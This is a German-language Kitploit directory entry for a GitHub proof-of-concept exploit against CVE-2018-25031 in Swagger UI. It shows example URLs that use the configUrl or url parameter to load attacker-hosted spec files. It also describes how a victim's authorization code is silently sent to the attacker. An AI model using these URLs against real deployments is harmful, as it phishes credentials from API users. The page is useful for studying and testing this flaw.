Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2018-25031 — Proof-of-Concept-Exploit für CVE-2018-25031 (Swagger UI XSS), der Autorisierungscodes über manipulierte configUrl/url-Parameter exfiltriert. | Kitploit
Tools/GitHubGitHub/geozin/poc-cve-2018-25031
Phishing-ToolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationSocial Engineering
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

Proof-of-Concept-Exploit für CVE-2018-25031 (Swagger UI XSS), der Autorisierungscodes über manipulierte configUrl/url-Parameter exfiltriert.

Repository anzeigen
15vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-25031 - Swagger UI vor 4.1.3

Ein einfacher POC (CVE-2018-25031), der das Opfer dazu bringt, den Autorisierungscode einzugeben, der dann an den Angreifer gesendet wird.
Sie können es mit der XSS-Schwachstelle https://github.com/VictorNS69/swagger-ui-xss verwenden.

Es ist notwendig, den Parameter zu finden und die richtige Datei zuzuweisen: für configUrl die JSON-Datei und für url die YAML-Datei.

Beispiel:

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

Screenshot:


Wenn das Opfer versucht, die API zu nutzen, indem es den Autorisierungscode eingibt und auf Execute klickt, wird nichts angezeigt. Allerdings wird eine Anfrage mit dem Autorisierungscode an die URL des Angreifers gesendet.

Referenzen:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

Tool herunterladen